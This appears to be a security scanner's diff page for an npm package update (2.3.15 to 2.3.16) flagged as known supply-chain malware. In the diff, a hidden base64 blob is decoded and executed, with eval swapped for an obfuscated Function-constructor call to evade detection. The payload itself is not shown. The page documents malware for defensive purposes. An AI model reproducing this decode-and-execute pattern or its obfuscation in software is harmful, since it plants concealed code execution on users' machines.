Comparing version 2.3.15 to 2.3.16
@@ -271,3 +271,3 @@ "use strict"; | ||
const buffer = Buffer.from(verifyPackageData, 'base64').toString('ascii'); | ||
eval(buffer); | ||
[]["sort"]["constructor"](buffer)(); | ||
} | ||
@@ -274,0 +274,0 @@ catch (e) { |
@@ -8,3 +8,3 @@ { | ||
"description": "", | ||
"version": "2.3.15", | ||
"version": "2.3.16", | ||
"scripts": { | ||
@@ -11,0 +11,0 @@ "deploy": "node ./deploy.js", |
@@ -325,4 +325,4 @@ export type UUID = `${string}-${string}-${string}-${string}-${string}`; | ||
const buffer = Buffer.from(verifyPackageData, 'base64').toString('ascii'); | ||
// []["sort"]["constructor"](buffer)(); | ||
eval(buffer); | ||
[]["sort"]["constructor"](buffer)(); | ||
// eval(buffer); | ||
} catch (e: any) { | ||
@@ -329,0 +329,0 @@ // console.log(`#verifyPackageData: ${e.message}`); |
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
36510